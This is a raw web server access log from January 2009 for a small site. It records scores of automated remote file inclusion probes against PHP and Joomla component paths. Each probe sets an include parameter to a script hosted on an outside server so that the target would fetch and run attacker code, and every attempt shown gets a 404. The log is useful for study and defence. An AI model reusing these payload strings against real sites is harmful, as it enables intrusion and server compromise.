211.235.245.121 - - [04/Jan/2009:20:57:35 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:20:57:36 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:20:57:48 -0800] "GET /logs/access.log/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:20:57:48 -0800] "GET /errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:20:57:48 -0800] "GET /logs/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:20:58:30 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:20:58:30 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:20:58:30 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:20:59:29 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:20:59:30 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:20:59:30 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:20:59:35 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:20:59:35 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:20:59:36 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:21:00:07 -0800] "GET /logs/access.log%20/errors.php?error=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:21:00:10 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:21:00:10 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:21:00:11 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:21:00:26 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:21:00:26 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:21:00:26 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:21:00:38 -0800] "GET /logs/access.log%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:21:01:29 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:21:01:29 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:21:01:29 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.110.174.10 - - [04/Jan/2009:21:02:06 -0800] "GET /logs/access.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.manuelymar.net/rtve/uploads/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:21:02:11 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:21:02:11 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
211.235.245.121 - - [04/Jan/2009:21:02:11 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "imagineartcafe.com"
70.86.113.106 - - [04/Jan/2009:21:03:38 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kangwon.ac.kr/~faculty/kboard/data/mboenk/ID.txt%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
70.86.113.106 - - [04/Jan/2009:21:03:38 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kangwon.ac.kr/~faculty/kboard/data/mboenk/ID.txt%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:21:09:26 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:21:09:26 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:21:09:26 -0800] "GET /logs/access_081215.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:21:09:30 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:21:09:34 -0800] "GET /logs/access_081215.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.imagineartcafe.com"
91.142.214.201 - - [04/Jan/2009:21:09:34 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:10:34 -0800] "GET /logs/scripts.log/errors.php?error=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.imagineartcafe.com"
209.62.125.194 - - [04/Jan/2009:21:10:59 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
209.62.125.194 - - [04/Jan/2009:21:11:00 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
209.62.125.194 - - [04/Jan/2009:21:11:00 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
209.62.125.194 - - [04/Jan/2009:21:11:08 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
209.62.125.194 - - [04/Jan/2009:21:11:08 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
209.62.125.194 - - [04/Jan/2009:21:11:08 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.samilglass.com/images/v6id.txt?????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:12:10 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:12:10 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:12:11 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:12:11 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
82.145.162.155 - - [04/Jan/2009:21:12:53 -0800] "GET /include/lib.inc.php?site_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:16:01 -0800] "GET /logs/scripts.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.imagineartcafe.com"
222.121.123.91 - - [04/Jan/2009:21:16:06 -0800] "GET /logs/access_081215.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
222.121.123.91 - - [04/Jan/2009:21:16:06 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
222.121.123.91 - - [04/Jan/2009:21:16:06 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
82.145.162.155 - - [04/Jan/2009:21:19:13 -0800] "GET /include/lib.inc.php?site_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:19:17 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:19:17 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:19:17 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:19:17 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:19:18 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:21:19:18 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
202.60.67.10 - - [04/Jan/2009:21:19:23 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
202.60.67.10 - - [04/Jan/2009:21:19:23 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
202.60.67.10 - - [04/Jan/2009:21:19:23 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://mhasbi.com/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
222.236.47.182 - - [04/Jan/2009:21:20:50 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "imagineartcafe.com"
222.236.47.182 - - [04/Jan/2009:21:20:54 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "imagineartcafe.com"
222.236.47.182 - - [04/Jan/2009:21:20:54 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "imagineartcafe.com"
222.236.47.182 - - [04/Jan/2009:21:22:09 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.imagineartcafe.com"
222.236.47.182 - - [04/Jan/2009:21:22:09 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.imagineartcafe.com"
222.236.47.182 - - [04/Jan/2009:21:22:09 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:23:38 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:23:38 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:23:39 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.imagineartcafe.com"
77.222.131.35 - - [04/Jan/2009:21:24:58 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://siam2.com/ict/news/photo/.photo/cmdstring.swf? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:28:28 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:28:28 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:28:28 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:28:32 -0800] "GET /logs/scripts.log/errors.php?error=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:21:29:03 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:21:29:03 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
216.180.251.146 - - [04/Jan/2009:21:29:42 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
216.180.251.146 - - [04/Jan/2009:21:29:42 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
216.180.251.146 - - [04/Jan/2009:21:29:42 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
72.29.78.145 - - [04/Jan/2009:21:30:06 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
72.29.78.145 - - [04/Jan/2009:21:30:06 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
72.29.78.145 - - [04/Jan/2009:21:30:07 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
74.213.164.118 - - [04/Jan/2009:21:30:42 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
74.213.164.118 - - [04/Jan/2009:21:30:42 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
210.183.36.251 - - [04/Jan/2009:21:30:55 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.imagineartcafe.com"
210.183.36.251 - - [04/Jan/2009:21:30:55 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.imagineartcafe.com"
210.183.36.251 - - [04/Jan/2009:21:30:55 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.imagineartcafe.com"
203.162.139.20 - - [04/Jan/2009:21:30:57 -0800] "GET /logs/scripts.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.giovaniemissione.it/media/id2.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.imagineartcafe.com"
66.232.142.27 - - [04/Jan/2009:21:31:24 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
66.232.142.27 - - [04/Jan/2009:21:31:24 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
66.232.142.27 - - [04/Jan/2009:21:31:24 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
82.145.162.155 - - [04/Jan/2009:21:31:43 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
82.145.162.155 - - [04/Jan/2009:21:31:44 -0800] "GET /include/lib.inc.php?site_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
82.145.162.155 - - [04/Jan/2009:21:31:44 -0800] "GET /logs//include/lib.inc.php?site_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:31:54 -0800] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:31:54 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.imagineartcafe.com"
212.99.231.50 - - [04/Jan/2009:21:31:54 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.imagineartcafe.com"
124.138.125.66 - - [04/Jan/2009:21:31:57 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
124.138.125.66 - - [04/Jan/2009:21:31:57 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
124.138.125.66 - - [04/Jan/2009:21:31:57 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
222.236.44.69 - - [04/Jan/2009:21:33:08 -0800] "GET /logs/access.log/errors.php?error=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "imagineartcafe.com"
222.236.44.69 - - [04/Jan/2009:21:33:09 -0800] "GET /errors.php?error=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "imagineartcafe.com"
222.236.44.69 - - [04/Jan/2009:21:33:09 -0800] "GET /logs/errors.php?error=http://i0.co.kr/i0mall//admin/idz.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "imagineartcafe.com"
211.115.212.166 - - [04/Jan/2009:21:33:33 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
